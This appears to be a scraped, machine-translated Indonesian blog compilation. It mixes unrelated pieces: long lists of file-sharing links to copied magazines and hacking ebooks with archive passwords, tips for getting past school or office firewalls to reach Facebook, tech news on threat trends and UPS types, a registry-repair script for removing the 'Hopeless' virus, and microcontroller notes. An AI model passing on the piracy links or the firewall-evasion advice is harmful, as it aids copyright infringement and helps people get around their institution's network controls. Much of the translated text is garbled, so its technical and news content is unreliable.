http://www.indowebster.com/PhotoshopCreativeIssue_19.html
http://www.indowebster.com/PhotoshopCreativeIssue_20.html
http://www.indowebster.com/PhotoshopCreativeIssue_21.html
http://www.indowebster.com/PhotoshopCreativeIssue_22.html

http://www.indowebster.com/PhotoshopCreativeIssue_23.html
http://www.indowebster.com/PhotoshopCreativeIssue_24.html
http://www.indowebster.com/ComputerGraphicsWorld012006.html
http://www.indowebster.com/ComputerGraphicsWorld022006.html
http://www.indowebster.com/ComputerGraphicsWorld032006.html
http://www.indowebster.com/ComputerGraphicsWorld042006.html
http://www.indowebster.com/ComputerGraphicsWorld052006.html
http://www.indowebster.com/ComputerGraphicsWorld062006.html
http://www.indowebster.com/ComputerGraphicsWorld072006.html
http://www.indowebster.com/ComputerGraphicsWorld082006.html
http://www.indowebster.com/ComputerGraphicsWorld092006.html
http://www.indowebster.com/ComputerGraphicsWorld102006.html
http://www.indowebster.com/ComputerGraphicsWorld112006.html
http://www.indowebster.com/ComputerGraphicsWorld122006.html
http://www.indowebster.com/ComputerGraphicsWorld012007.html
http://www.indowebster.com/ComputerGraphicsWorld022007.html
http://www.indowebster.com/ComputerGrapComputerGraphicsWorld032007.html
http://www.indowebster.com/ComputerGraphicsWorld042007.html
http://www.indowebster.com/ComputerGraphicsWorld052007.html
http://www.indowebster.com/ComputerGraphicsWorld062007.html
http://www.indowebster.com/ComputerGraphicsWorld072007.html
http://www.indowebster.com/ComputerGraphicsWorld082007.html
http://www.indowebster.com/ComputerGraphicsWorld092007.html
http://www.indowebster.com/ComputerGraphicsWorld102007.html
http://www.indowebster.com/ComputerGraphicsWorld112007.html
http://www.indowebster.com/ComputerGraphicsWorld122007.html
http://www.indowebster.com/ComputerGraphicsWorld012008.html
http://www.indowebster.com/ComputerGraphicsWorld022008.html
http://www.indowebster.com/ComputerGraphicsWorld032008.html
http://www.indowebster.com/ComputerGraphicsWorld042008.html
http://www.indowebster.com/ComputerGraphicsWorld052008.html
http://www.indowebster.com/Animation_Magazine012006.html
http://www.indowebster.com/Animation_Magazine022006.html
http://www.indowebster.com/Animation_Magazine032006.html
http://www.indowebster.com/Animation_Magazine042006.html
http://www.indowebster.com/Animation_Magazine052006.html
http://www.indowebster.com/Animation_Magazine062006.html
http://www.indowebster.com/Animation_Magazine072006.html
http://www.indowebster.com/Animation_Magazine082006.html
http://www.indowebster.com/Animation_Magazine092006.html
http://www.indowebster.com/Animation_Magazine102006.html
http://www.indowebster.com/Animation_Magazine112006.html
http://www.indowebster.com/Animation_Magazine122006.html
http://www.indowebster.com/Animation_Magazine012007.html
http://www.indowebster.com/Animation_Magazine022007.html
http://www.indowebster.com/Animation_Magazine032007.html
http://www.indowebster.com/Animation_Magazine042007.html
http://www.indowebster.com/Animation_Magazine052007.html
http://www.indowebster.com/Animation_Magazine062007.html
http://www.indowebster.com/Animation_Magazine072007.html
http://www.indowebster.com/Animation_Magazine082007.html
http://www.indowebster.com/Animation_Magazine092007.html
http://www.indowebster.com/Animation_Magazine102007.html
http://www.indowebster.com/Animation_Magazine112007.html
http://www.indowebster.com/Animation_Magazine122007.html
http://www.indowebster.com/Animation_Magazine012008.html
http://www.indowebster.com/Animation_Magazine022008.html
http://www.indowebster.com/Animation_Magazine032008.html
http://www.indowebster.com/Animation_Magazine042008.html
http://www.indowebster.com/Animation_Magazine052008.html
http://www.indowebster.com/Animation_Magazine062008.html
http://www.indowebster.com/3D_Creative012008.html
http://www.indowebster.com/3D_Creative022008.html
http://www.indowebster.com/3D_Creative032008.html
http://www.indowebster.com/3D_Creative042008.html
http://www.indowebster.com/3D_Creative052008.html
http://www.indowebster.com/Civil_Eng_Books_wwwsoftarchivenetpart01.html
http://www.indowebster.com/Civil_Eng_Books_wwwsoftarchivenetpart02.html
http://www.indowebster.com/Civil_Eng_Books_wwwsoftarchivenetpart03.html
http://www.indowebster.com/Civil_Eng_Books_wwwsoftarchivenetpart04.html
http://www.indowebster.com/Civil_Eng_Books_wwwsoftarchivenetpart05.html
http://www.indowebster.com/Civil_Eng_Books_wwwsoftarchivenetpart06.html
http://www.indowebster.com/Civil_Eng_Books_wwwsoftarchivenetpart07.html
http://www.indowebster.com/Civil_Eng_Books_wwwsoftarchivenetpart08.html
http://www.indowebster.com/Civil_Eng_Books_wwwsoftarchivenetpart09.html
http://www.indowebster.com/Civil_Eng_Books_wwwsoftarchivenetpart10.html
http://www.indowebster.com/Civil_Eng_Books_wwwsoftarchivenetpart11.html
http://www.indowebster.com/Civil_Eng_Books_wwwsoftarchivenetpart12.html
http://www.indowebster.com/Civil_Eng_Books_wwwsoftarchivenetpart13.html
http://www.indowebster.com/just_4_fun.html
pass: 112358132134
http://www.indowebster.com/CHIP_12_2007.html
http://www.indowebster.com/CHIP_01_2008.html
http://www.indowebster.com/CHIP_02_2008.html
http://www.indowebster.com/CHIP_03_2008.html
http://www.indowebster.com/CHIP_04_2008.html
http://rapidshare.com/users/VDBAGI
http://rapidshare.com/users/G9CTCC

http://rapidshare.com/files/115998178/JENI.rar

Hacking Firefox:

http://www.indowebster.com/150_FF_Hacks.html
55 Ways to Have Fun With Google:
http://www.indowebster.com/Having_Fun_with_Google.html
http://rapidshare.com/files/8836610/Practical_VoIP_Security__2007_.pdf
pass: www.Chipollo.Info
http://rapidshare.com/files/5955395/Cisco.Press.MPLS.and.Next.Generation.Networks.Nov.2006.chm
pass: www.Chipollo.Info
Internet & Intranet Security: rapidshare.com/files/10015356/interintrasec.rar
rapidshare.com/files/9454213/Art_of_War.rar
rapidshare.com/files/10047967/Teach_Yourself_-_Teach_Yourself_Speed_Reading.pdf
Microsoft Windows Vista Visual QuickStart Guide:
http://rapidshare.com/files/11414892/ppmwvvqg0612.rar
pass: www.softarchive.net
Excel 2007 The Missing Manual:
http://rapidshare.com/files/11262094/oe2007tmm0612.rar pass: www.softarchive.net

Hacking Windows Vista:

http://download.wavepluz.net/pub/
http://info.ugm.ac.id/iso/
http://mirror.its.ac.id/ISO/
http://tuma.ui.edu/pub/
http://kambing.vlsm.org/tuma/pub/
http://www.indotel.net/DownLoad/
http://opensource.jawatengah.go.id/download/
http://www.kristenonline.com/download/
http://118.98.171.130/Unduhan/e-Book/
http://amudiono.web.id/download/
http://www.sma-alirsyad-clp.sch.id/download/
http://voucherflash.com/download/
http://www.wayofmuslim.com/ebook-islam/
http://www.coltech.vnu.edu.vn/ttmt/ebooks/books/
http://pub.bhaktiganesha.or.id/itb77/files/Karya%20Nyata/
http://info.ugm.ac.id/iso/

http://lirva32.org/download/
http://support.unpad.ac.id/updatevirus/
http://www.djawir.net/download/
http://www.harmoni-media.com/download/
http://www.1800phpscripts.co.cc
http://web1hari.com/file/
http://www.warintek.ristek.go.id/pangan_kesehatan/pangan/ipb/
http://www.warintek.ristek.go.id/pangan_kesehatan/
http://download.pti.esdm.go.id/

Free ebooks on hacking

http://rapidshare.com/files/100001418/Security_problems_in_TCP_IP_Protocol_Suite.pdf.html

http://rapidshare.com/files/99999128/Mission_Critical_Internet_Security.pdf.html

http://rapidshare.com/files/100005754/unix_configuration_guidelines_from_CERT_1_.txt.html

http://rapidshare.com/files/100005717/unix_configuration_guidelines_from_CERT.txt.html

http://rapidshare.com/files/100024679/Certified_Ethical_Hacker__CEH__v3.0_Official_Course.pdf.html

http://rapidshare.com/files/100005672/Unix_Use_And_Security_from_the_Ground_Up.pdf.html

http://rapidshare.com/files/100024865/CheckPoint_NG_Security_Administration.pdf.html

http://rapidshare.com/files/100006621/_0735710090_Hackers_Beware_Defending_Your_Network_From_The_Wiley_Hacker.pdf.html

http://rapidshare.com/files/100012142/Hacking_for_Dummies-Access_to_Other_Peoples_Systems_Made_Simple.pdf.html

http://rapidshare.com/files/100021561/0072193999_-_McGraw-Hill.XML.Security_-
_fly.pdf.html

http://rapidshare.com/files/100022042/A_Buffer_Overflow_Study_-_Attacks_and_Defenses.pdf.html

http://rapidshare.com/files/100023900/Building_Secure_Wireless_Networks_with_802.11__Wiley_.pdf.html

http://rapidshare.com/files/100016227/2600.The.Hacker.Quarterly.vol19.no4-EEn.pdf.html

http://rapidshare.com/files/100018840/0071410732_-_McGraw-Hill.Wi-Fi.Security_-_fly.pdf.html

http://rapidshare.com/files/100022003/0471328480_-_Wiley.Managing.the.Risks.of.Payment.System_-_fly.pdf.html

http://rapidshare.com/files/100009286/_1931836507_Syngress_-_Hack_Proofing_XML.pdf.html

http://rapidshare.com/files/100027068/core_vulnerabilities.pdf.html

http://rapidshare.com/files/100022414/Addison_Wesley_-_Enterprise_Security._The_Manager_s_Defense_Guide_by_Kiwy.pdf.html

http://rapidshare.com/files/99998460/McGraw-Hill_-_HackNotes_Network_Security_Portable_Reference.pdf.html

http://rapidshare.com/files/100014999/security-policy.pdf.html

http://rapidshare.com/files/100035966/Guide_To_Harmless_Hacking.zip.html

http://rapidshare.com/files/100008902/_1928994156_Syngress_-_Hack_Proofing_your_Network_Internet_Tradecraft.pdf.html

http://rapidshare.com/files/100032893/ebook_-_hacker_s_desk_reference.pdf.html

http://rapidshare.com/files/100023538/Artech_-_Role-Based_Access_Control_-_fly.pdf.html

http://rapidshare.com/files/100026786/Computer_Vulnerability_March_9_2000_.pdf.html

http://rapidshare.com/files/100016154/2600.The.Hacker.Quarterly.vol19.no3-EEn.pdf.html

http://rapidshare.com/files/100021979/A_Buffer_Overflow_Study_-_Attacks_and_Defenses__2002_.pdf.html

http://rapidshare.com/files/100036037/gracldoc.pdf.html

http://rapidshare.com/files/100005479/Tricks_of_the_Internet_Gurus__April_1999_.pdf.html

http://rapidshare.com/files/100006659/_0470852852_Internet_Security.pdf.html

http://rapidshare.com/files/100034115/fbsd-shellcode.txt.html

http://rapidshare.com/files/100000896/Network_Security.pdf.html

http://rapidshare.com/files/100007735/_0782129161_Sybex_-_Active_Defense_-_A_Comprehensive_Guide_to_Network_Security.pdf.html

http://rapidshare.com/files/100015257/Hacking_for_Dummies__John_Wiley-2004_.pdf.html

http://rapidshare.com/files/100032918/Defense.and.Detection.Strategies.Against.Internet.Worms.2004_by.KiN_www.netz.ru_.pdf.html

http://rapidshare.com/files/100034287/fmtbuilder.txt.html

http://rapidshare.com/files/100014199/Secure-Programs-HOWTO.pdf.html

http://rapidshare.com/files/100001992/The_Art_of_Intrusion-The_Real_Stories_Behind_the_Exploits_of_Hackers_Intruders_and_Deceivers__Wil.pd.html

http://rapidshare.com/files/100006010/wrapster_-_books_-_the_hackers_blackbook_.pdf.html

http://rapidshare.com/files/100034277/Firewalls_Complete.zip.html

http://rapidshare.com/files/100027215/Cracking_SQL2K_passwords.pdf.html

http://rapidshare.com/files/100032111/CRC_Press_-_Cyber_Crime_Investigator_s_Field_Guide.pdf.html

http://rapidshare.com/files/100032927/ebook_-_ultimate_beginners_guide_to_hacking_and_phreaking_1_.doc.html

http://rapidshare.com/files/100009540/_1931836515_Syngress_-_Hack_Proofing_Your_Identity.pdf.html

http://rapidshare.com/files/100031907/Credit_Card_Visa_Hack_Cambridge_Lab-2003_.pdf.html

http://rapidshare.com/files/100027883/Crackproof_Your_Software.pdf.html

http://rapidshare.com/files/100004756/the_hackers_black_book.doc.html

http://rapidshare.com/files/100005545/UnderstandingWirelessLANSecurity.pdf.html

http://rapidshare.com/files/100003551/The_Hacker_Crackdown.pdf.html

http://rapidshare.com/files/100028786/Crackproof_Your_Software_No_Starch-2002_.pdf.html

http://rapidshare.com/files/100004995/the_little_black_book_of_computerviruses.zip.html

http://rapidshare.com/files/100012198/_1931836655_Syngress_-_Scene_Of_The_Cybercrime.Pdf.html

http://rapidshare.com/files/99993776/Hacking_Exposed_-_Network_Security_Secrets___Solutions_2ed_-_McGrawHill_-_2001_-_by_joel_scambray.pd.html

http://rapidshare.com/files/100023796/AMACOM_-_The_E-Privacy_Imperative_-_fly.pdf.html

http://rapidshare.com/files/100005518/Underground_Hacking_Madness___Obsession_on_the_Electronic_Frontier__Suelette_Dreyfus___Julian_Ass.pd.html

http://rapidshare.com/files/100033571/Ethical_Hacking_Student_Guide.pdf.html

http://rapidshare.com/files/100009105/_1928994202_Syngress_-_Mission_Critical_Internet_Security.pdf.html

http://rapidshare.com/files/100005934/unix_security_checklist_1_.txt.html

http://rapidshare.com/files/100032572/Dumping_Code_for_Spying_and_Windows_Tools.pdf.html

http://rapidshare.com/files/100033315/e-book_-_Java_2_Network_Security.pdf.html

http://rapidshare.com/files/100020844/0072193840.McGraw-Hill.Hacker_s_ChallengeEbook-FLY.pdf.html

http://rapidshare.com/files/100027099/Cracking.Tutorial.Compilation.Vol.1.Tikka.Wang.pdf.html

http://rapidshare.com/files/100023231/an.indepth.guide.in.hacking.unix.shareconnector.com.txt.html

http://rapidshare.com/files/100024288/Artech-Multicast_and_Group_Security-fly.pdf.html

http://rapidshare.com/files/100002763/The_Complete_History_of_Hacking.pdf.html

http://rapidshare.com/files/100001779/o_reilly_-_network_security_hacks.chm.html

http://rapidshare.com/files/100004389/The_Hacker_s_Handbook.pdf.html

http://rapidshare.com/files/99992232/Hacking_Wireless_Networks_for_Dummies.pdf.html

http://rapidshare.com/files/100011827/Hacker_s_Desk_Reference.pdf.html

http://rapidshare.com/files/100037691/Hack_Proofing_-_Your_Network_-_Internet_Tradecraft.pdf.html

http://rapidshare.com/files/100034774/Google_Hacking_for_Penetration_Tester__Syngress-2005_.pdf.html

http://rapidshare.com/files/100038603/Hack_Proofing_ColdFusion.pdf.html

http://rapidshare.com/files/100036336/Hack_Attacks_Revealed.pdf.html

http://rapidshare.com/files/100037459/Hack_Attacks_Revealed-_A_Complete_Reference_with_Custom_Security_Hacking_Toolkit__Wiley-2001_.pdf.html

http://rapidshare.com/files/100022861/Addison_Wesley_-_Have_You_Locked_the_Castle_Gate._Home_and_Small_Business_Computer_Security_by_Ki.pd.html

http://rapidshare.com/files/100038603/Hack_Proofing_ColdFusion.pdf.html

http://rapidshare.com/files/100039635/Hack_Proofing_Your_Identity_in_the_Information_Age.pdf.html

http://rapidshare.com/files/100039013/Hack_Proofing_Sun_Solaris_8.pdf.html

http://rapidshare.com/files/100041228/Hack_Proofing_Your_Identity_in_the_Information_Age__Syngress-2002_.pdf.html

http://rapidshare.com/files/99993788/Hack_Proofing_your_Web_Applications.pdf.html

http://rapidshare.com/files/100009286/_1931836507_Syngress_-_Hack_Proofing_XML.pdf.html

http://rapidshare.com/files/100014712/Stealing_the_Network__How_to_Own_the_Box___Syngress-2003_.pdf.html

http://rapidshare.com/files/100055541/ms_press_-_microsoft_encyclopedia_of_security.pdf.html
http://rapidshare.com/files/100059249/Syngress.Cybercrime.pdf.html
http://rapidshare.com/files/100047842/Hacking_Guide_v3.1_www.netz.ru_.pdf.html
http://rapidshare.com/files/100047052/Hacking_GPS__2005_.pdf.html
http://rapidshare.com/files/100062534/Syngress.RFID.Security.Apr.2006.eBook-DDU.pdf.html
http://rapidshare.com/files/100054750/McGraw-Hill_-_HackNotes_Windows_Security_Portable_Reference.pdf.html
http://rapidshare.com/files/100045115/Hacking_Exposed-_Network_Security_Secrets_and_Solutions__MCGraw-Hill-2001_.pdf.html
http://rapidshare.com/files/100063435/Syngress_CheckPoint_NG_eBook.pdf.html
http://rapidshare.com/files/100064934/Syngress-InternetSecurity-IntSec_book.pdf.html
http://rapidshare.com/files/100044508/Hackers_Beware__2001_.pdf.html
http://rapidshare.com/files/100057900/Spidering_Hacks_O_Reilly-_October_2003_.chm.html
http://rapidshare.com/files/100047363/Hacking_Exposed-_Web_Applications__MCGraw-Hill-2002_.pdf.html
http://rapidshare.com/files/100044294/hacker.doc.html
http://rapidshare.com/files/100061553/Syngress.Hackproofing.Wireless.pdf.html
http://rapidshare.com/files/100053454/Maximum_Security_-_SAMS.pdf.html
http://rapidshare.com/files/100052341/John_Wiley___Sons_-_Hacking_For_Dummies.pdf.html
http://rapidshare.com/files/100048397/Hacking_Gmail__2006_.pdf.html
http://rapidshare.com/files/100051737/Intrusion_Detection_with_SNORT_-_Advanced_IDS_Techniques_Using_SNORT__Apache__MySQL__PHP__and_ACI.pd.html
http://rapidshare.com/files/100056531/Premier_-_1592000053_-_Solaris_9_Security_-_fly.pdf.html
http://rapidshare.com/files/100054261/McGraw-Hill_-_HackNotes_Linux_and_Unix_Security_Portable_Reference.pdf.html
http://rapidshare.com/files/100044741/HackersBook.txt.html
http://rapidshare.com/files/100049109/Hackproofing.linux_html_.zip.html
http://rapidshare.com/files/100044809/Hackers_Black_Book.doc.html
http://rapidshare.com/files/100045084/Hacking_Exposed_-_by_Joel_scambray_and_Mike_shema.pdf.html
http://rapidshare.com/files/100043733/Hackers_Beware__NewRiders_-2002_.pdf.html
http://rapidshare.com/files/100043540/HACKER_Secret_book.PDF.html
http://rapidshare.com/files/100044854/Hacker_s_Desk_Reference.doc.html
http://rapidshare.com/files/100048223/Hacking_Manual.doc.html

http://rapidshare.com/files/100098340/Maximum_Security.zip.html
http://rapidshare.com/files/100097889/Intrusion_Detection_with_SNORT.pdf.html
http://rapidshare.com/files/100097806/Incident_Response_-_Computer_Forensics_Toolkit.pdf.html
http://rapidshare.com/files/100042217/Hack_Proofing_Your_Network_-_Internet_Tradecraft__Syngress-2000_.pdf.html
http://rapidshare.com/files/100014712/Stealing_the_Network__How_to_Own_the_Box___Syngress-2003_.pdf.html
http://rapidshare.com/files/100037459/Hack_Attacks_Revealed-_A_Complete_Reference_with_Custom_Security_Hacking_Toolkit__Wiley-2001_.pdf.html
http://rapidshare.com/files/100038603/Hack_Proofing_ColdFusion.pdf.html
http://rapidshare.com/files/100034774/Google_Hacking_for_Penetration_Tester__Syngress-2005_.pdf.html

Hacking Facebook

Facebook hacks:

The scripts in these hacks require Firefox. Firefox is a free web-browsing program similar to Internet Explorer with additional security features and options.

After you install Firefox, you'll need Greasemonkey. Greasemonkey is a Firefox extension which lets you to add bits of DHTML ("user scripts") to any web page to change its behavior. In much the same way that user CSS lets you take control of a web page's style, user scripts let you easily control any aspect of a web page's design or interaction. Greasemonkey is free. You can download it here: Download Greasemonkey (note: this link will not work in Internet Explorer - you must have Firefox installed to install and use Greasemonkey. If you don't have Firefox, you can download it here for free.)

After you've installed Firefox and Greasemonkey, you can install these scripts:

AutoLogin: Facebook autologin automatically logs you in to Facebook (it stops asking you to log in every time!)
Change the color of Facebook: This script changes the default color of your Facebook. By modifying the code you can make it whatever color scheme you want.

How to get into Facebook if your school blocks it:

Many schools and businesses use a firewall to block access to websites like Facebook, Friendster, Hi5, MSN Spaces, Hotmail, Yahoo email, and other email sites, making it difficult (but not impossible) to access them.

If your school or office firewall blocks access to Facebook, Friendster, Hi5, Gmail, or Yahoo email you may be able to use a few internet privacy tricks get get around the firewalls and access any website you want.

The easy way: Try Firefox to get around the firewall

"Firefox has built-in proxy connection settings"

Try the built-in proxy connection settings with an Anonymizer service to access Facebook from school or work

Firefox is not affected by many network restrictions that system administrators may automatically apply to Internet Explorer every time you use it. More importantly, Firefox has built-in proxy-connection settings, which when used with settings that you can get from an anonymous web surfing or anonymizer service, can allow you to get to virtually any website you want even if it is blocked by a firewall. Firefox has several other features such as Google-integration for faster searches, automatic pop-up blockers and more. Firefox is free.

Get to Facebook from work or school, even through a firewall by using an Anonymizer or Private web surfing site

For years internet privacy experts have been using anonymizers, private web-surfing services

source : hackercatalog.com

Cyber attack trends in 2009

Trends main threats to cyber security in 2009 began to predict. According to Kaspersky Labs security bureau, the cyber criminals will increasingly reinforce zealous attack on the smartphone device in the future.

The company predicts that the popularity of Apple iPhone, also with the launch of Google's Android operating system is more uphill existence, so factors triggered the criminal slam smartphone.

Kaspersky explained, the evolution of the mobile phone is almost the same as happened in the PC. Only about 1 in the decade, the original mobile phone ribet and expensive, so the device has been provided advanced features high-speed internet access.

That is, smartphone become soft targets for the next cracker, the same as that befall a PC.

Magnus Kalkuhl, members of Kaspersky Lab Global Research & Analysis Team
estimate, the attack on the smartphone will be a regular. Scale attacks in 2009 is still limited, but within a period of 5 years, the program will be evil 'everyday food' smartphone users.

In addition to the smartphone, Kasperksy also predict a rapid increase in cyber attacks to social networking sites. This triggered many users who do not believe so cautious and only with the security networking site. While the site itself is often slow in mersepon a security threat occurs.

Kalkuhl the old method to predict the spread of malicious code via e-mail is rarely used in the year 2009. Dilansir WebUser and cited detikINET, Tuesday (30/12/2008), especially the threat of cyber will spread via a link where if the link is clicked, the program will be bad pitch directly downloaded on the computer.

4 Type of UPS, Profit and Lost

You may already know Uninteruptible Power Supply (UPS) hardware. However, people often recognize only two types of UPS that is most easily found in the market.

Both types are the type of UPS and standby UPS type online. In fact, UPS has several other advantages and kekurangannya with each.

American Power Conversion (APC), a global leader in critical power services and cooling services are also popular with UPSnya products, provide information and tips about multiformity UPS so users can better identify and select the UPS in accordance with their needs.

From model design, as quoted from the release of detikINET received, on Tuesday (16/12/2008), UPS is divided in several types of produce different performance characteristics:
Standby
Line Interactive
Double Conversion On-Line
Delta Conversion On-Line

Standby UPS type

This type usually used by the home user to disandingkan with their PC. UPS equipment is able to perform like this against interference filtrasi power and flow management, in addition to the efficient design, small size and cheap.

Line Interactive UPS type

UPS is the type most often used on small business units, web developers, and a number of servers that are in the government department. For, in addition to having a high level of reliability, this type also has the ability to adjust the voltage is quite good.

UPS has an inverter, which is always connected to the output of the UPS system to change the power from the Battery to the AC. In normal circumstances, will make the inverter Battery. Meanwhile, in the electricity off, Transfer Switch will close and drain power from the Battery to the UPS output.

Position the inverter is always connected to the output filter to provide additional resources. This makes this type of UPS with lots of servers used for electricity and conditions that are not too good.

UPS type Double Conversion On-Line

This type is the most common for UPS power with more than 10kVA. This type has similarities with the type Standby. Just type a main source of energy that lies in the inverter, not the AC power source.

On this type, the main electricity supply dissolution will not trigger the switch because of the transfer of AC electric current at the entrance to the input of the Battery which provides power to the inverter is located at the output.

Therefore, when the flow of AC power is lost, the flow of energy will be transferred immediately without taking a rest when the diversion occurs. UPS is the type of performance above average. This type can be said to a picture of an ideal UPS, unfortunately, this type of heat is high enough.

UPS type Delta Conversion On-Line

Almost the same as the Double Conversion type, the type Delta is always to use the inverter supply voltage. When power supply is lost, this type do the same type with Double Conversion.

Delta Conversion has two functions, the first is to control the characteristics of the input power. Meanwhile, the second function is to control the flow of direct input to the process of the system Battery.

Things to remember this is the type of energy that minimize terbuang. In addition, it has a high compatibility of the various types of generators and reduce the need for the use of cables.

In summary, advantages and disadvantages UPS types can be seen below:

Standby
The advantages: low cost, high efficiency, compact design.
Disadvantages: battery still in use when the power off; not suitable for use on the 2kVA.
Description: most suitable for personal users.

Line Interactive
The advantages: high reliability, high efficiency, good voltage adjustments.
Disadvantages: not suitable for use on the 5kVA.
Description: UPS is the type most often used in conditions that are not stabilized electricity.

Double Conversion On-Line
The advantage: the voltage adjustment is very good, easy to connect in parallel.
Disadvantages: Low efficiency; expensive price for the type of power under 5kVA.
Description: close to the ideal image of UPS, but the heat is high enough.

Delta Conversion On-line
The advantage: the voltage adjustment is very good; high efficiency.
Disadvantages: not suitable for use under 5kVA.

Description: high efficiency, extend the life cycle when the device is used on a large system.

source : detikinet.com

8 Step Eliminate 'Hopeless' in Computers

Just like a virus, in general, local, part II Hopeless virus spread through the media usb flash / external drive. In addition to the 3 main virus file, will also be Hopeless virus duplicate files on all folders.

See tips & tricks from Vaksincom, on Monday (5/12/2008), to eradicate the virus even though your computer is not 'hopeless':
1. Disconnect the computer that will be cleared from the network.
2. Should do the cleaning in safe mode.
3. Turn off the virus by using the tools of task manager, as itty Bitty Process Manager.
4. Make 'kill process', the file the virus is active, namely: C: \ WINDOWS \ system32 \ spool \ idle.exe
5. Remove string registry was created by the virus. To facilitate the registry can use the script below:

[Version]

Signature = "$ Chicago $"

Provider = Vaksincom Oyee

[DefaultInstall]

AddReg = UnhookRegKey

DelReg = del

[UnhookRegKey]

HKLM, Software \ CLASSES \ batfile \ shell \ open \ command ,,,"""% 1 ""% * "

HKLM, Software \ CLASSES \ comfile \ shell \ open \ command ,,,"""% 1 ""% * "

HKLM, Software \ CLASSES \ exefile \ shell \ open \ command ,,,"""% 1 ""% * "

HKLM, Software \ CLASSES \ piffile \ shell \ open \ command ,,,"""% 1 ""% * "

HKLM, Software \ CLASSES \ regfile \ shell \ open \ command,,, "regedit.exe" "% 1" ""

HKLM, Software \ CLASSES \ scrfile \ shell \ open \ command ,,,"""% 1 ""% * "

HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon, Shell, 0, "Explorer.exe"

HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows, AppInit_DLLs, 0

HKLM, SYSTEM \ ControlSet001 \ Control \ SafeBoot, AlternateShell, 0, "cmd.exe"

HKLM, SYSTEM \ CurrentControlSet \ Control \ SafeBoot, AlternateShell, 0, "cmd.exe"

[del]

HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System, DisableRegistryTools

HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System, DisableTaskMgr

HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer, NoFolderOptions

HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer, NoRun

HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer, NoFind

HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer, StartMenuLogoff

HKLM, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System, DisableRegistryTools

HKLM, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System, DisableTaskMgr

HKLM, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer, NoFolderOptions

HKLM, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer, NoRun

HKLM, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer, NoFind

HKCU, SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run, Repair

HKLM, SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run, Repair

6. Use notepad, then save with the name 'Repair.inf'. Then a Save As Type All Files to avoid an error occurred.
7. Repair.inf run with the right-click and select install. Repair.inf should create a file on a clean computer, so that the virus is not active.
8. Hapuskan master file and duplicate files that have been created by the virus Hopeless, where files are discrete icon folder, the file size is 247 kb, the file extension. Exe file and type 'application'.

Additional simply, to facilitate the removal of facilities can use the search. In addition to the optimal cleaning and prevent re-infection, use anti-virus that is able to recognize both the virus.

source : detikinet.com

the mobile phone is Medium kill bacteria

Minggu, 04 Januari 2009

Phone is sufficient so long feared sarang bacteria. Now, the fear was evident from the results of a study that says that some of the bacteria that can spread death through the medium phone.

In research that takes place in Scotland, the bacterial colonies growing in the phone recognized the doctors at the hospital. The majority of the bacteria that are not really dangerous. But there is also the effect can be fatal, including Clostridium difficile (C diff) and MRSA (Methicillin-resistant Staphylococcus aureus).

Quoted from detikINET scotsman, on Monday (5/1/2009), in the year ago in 2007 there were only 6,430 cases of Clostridium difficile infection in Scottish hospitals. The cases of death associated with MRSA reach hundreds in the same period.

Kill bacteria that can be unwittingly involved patients via phone or the hospital staff. Results were announced by health researchers from the Western General Hospital in Scotland, Richard Brady.

Brady out, this study was conducted related to the more melonjaknya the mobile phone by the hospital staff. But the problem, there is no adequate guidance on how to free up so that from the bacteria.

Phone also can be considered a means of infection transmission dangerous as they often come into contact with the hands and mouth of the user. There are bacteria that can continue to survive if the phone does not carefully cleaned.

Research conducted in the Scottish Infection Research Network and works with several university scientists, for example, from Manchester Metropolitan University.

source : detikinet.com

'Hopeless' Virus in New Years

Please be careful if you find a folder called false 'Credit Card', 'Hack' and 'XXX'. Never opened, if your computer does not want to be without hope 'because the virus infected the latest Hopeless.

Analysts Vaksincom virus from Adi Saputra, said the virus has actually Hopeless appear at the end of 2007, but this time seems to continue preceding Hopeless part II again appear to find prey.

"Norman Security Suite detects variants Hopeless part II with the name Dloader.ERQB. Unlike the preceding, the virus is created with the script using the BASIC language software Autoit version 3 which is then compressed with the UPX program," he said to detikINET, Monday (5 / 1 / 2009).

With UPX program, go Adi, the virus can be compressed so that it is not too big in size and can facilitate the spread of. Goal mengkompres this size is due to the small size of the file a virus it will automatically be easier.

Once compressed with UPX, virus Hopeless part II will have the characteristics using the icon folder, the file size is 247 kb, the file extension. Exe file and type 'application'.

Meanwhile, for the victims of the computer that is' hopeless' is exposed to the virus will occur following symptoms:
Some of the functions of the windows will be blocked, such as Task Manager, Command Prompt and Registry Editor.
Functions such as windows Run, Find, Folder Options, and Log Off will be lost.
IE window will be opened with the URL link http://wewe.helo_iam_hopeles_.com.
There was a duplication of virus files on all drives and folders both root and sub folders.

Programming techniques Mikrokontroler AT89C51

CPU (Central Processing Unit) based on the work. The sequence of commands is called the Program. The program is stored in ROM or RAM.

CPU which is owned by mikrokontroler 89C51 is an 8-bit CPU, which means that any data have long data of 8-bit or 1 byte is called.
However, data for the operation in mikrokontroler this operation can be done in one data bit, nibble (4 bit), byte (8 bits), and double-byte (16 bit).

Register A and B
A register is akumulator, used as a register for temporary data storage. In the program, the instructions to register as an A. Register B have specific functions in the operations division and multiplication, namely as a source and as a goal, while operating on the register as usual.

Status Register (Psw)
Register Psw (Program Status Word) is the 8-bit register. Register consists of bits CY, AC, FOR, RSO, OV, and P. Bit kesatu not used. Register this function to save the status information processor.
CY: contain the carry after arithmetic operations.
AC: Auxiliary carry contain the following arithmetic operations
OV: contains status arithmetic overflow after the operation.
P: parity of the register containing A.
FOR: is a flag for the general (general purpose flags) which will participate in the stack is stored in the saatpenyimpanan Psw.
RS0, RS1: voter register groups (four groups have to register).
CY (Carry) also functions as akumulator boolean operations for bit.

Bookmarks Pile (Stack Pointer)
Bookmarks stack (Stack Pointer) contain the address of the data entered into the last hill.
